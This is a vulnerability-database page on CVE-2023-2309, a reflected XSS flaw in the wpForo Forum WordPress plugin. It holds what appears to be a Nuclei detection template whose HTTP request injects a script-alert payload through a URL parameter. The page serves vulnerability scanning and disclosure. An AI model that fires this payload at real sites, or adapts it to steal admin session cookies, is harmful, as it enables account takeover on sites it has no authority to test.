| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2023-2309 | 24 Jul 202314:25 | – | circl | |
| WordPress Plugin wpForo Forum 跨站脚本漏洞 | 24 Jul 202300:00 | – | cnnvd | |
| CVE-2023-2309 | 24 Jul 202310:20 | – | cve | |
| CVE-2023-2309 wpForo Forum < 2.1.9 - Reflected Cross-Site Scripting | 24 Jul 202310:20 | – | cvelist | |
| EUVD-2023-33814 | 3 Oct 202520:07 | – | euvd | |
| CVE-2023-2309 | 24 Jul 202311:15 | – | nvd | |
| CVE-2023-2309 | 24 Jul 202311:15 | – | osv | |
| WordPress wpForo Forum Plugin < 2.1.9 is vulnerable to Cross Site Scripting (XSS) | 6 Jul 202300:00 | – | patchstack | |
| Cross site scripting | 24 Jul 202311:15 | – | prion | |
| PT-2023-18841 · WordPress · Wpforo Forum | 24 Jul 202300:00 | – | ptsecurity |
id: CVE-2023-2309
info:
name: wpForo Forum <= 2.1.8 - Cross-Site Scripting
author: s4e-io
severity: medium
description: |
The wpForo Forum plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘wpforo_debug’ function in versions up to, and including, 2.1.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
impact: |
Unauthenticated attackers can inject malicious JavaScript through the wpforo_debug function to steal WordPress administrator session cookies when they view crafted links.
remediation: Fixed in 2.1.9
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-2309
- https://wpscan.com/vulnerability/1b3f4558-ea41-4749-9aa2-d3971fc9ca0d/
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpforo/wpforo-forum-218-reflected-cross-site-scripting-via-wpforo-debug
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-2309
epss-score: 0.00812
epss-percentile: 0.52531
cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: gvectors
product: wpforo_forum
framework: wordpress
publicwww-query: "/wp-content/plugins/wpforo/"
tags: cve,cve2023,wordpress,wpforo,wpscan,wp-plugin,wp,xss,vuln
http:
- raw:
- |
GET /community/main-forum/?param=%3Cscript%3Ealert(/document.domain/)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"<script>alert(/document.domain/)</script>","wpforo")'
- 'contains(header,"text/html")'
- "status_code == 200"
condition: and
# digest: 490a0046304402204e6c82a9ad73dc8212f622c93569b203a13c3db69d6e09ff48588f3f208c7717022072b90e8acba69a96d5e8c9fc4470c0160f432096046ab6fb9c4f23d786e338d0:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation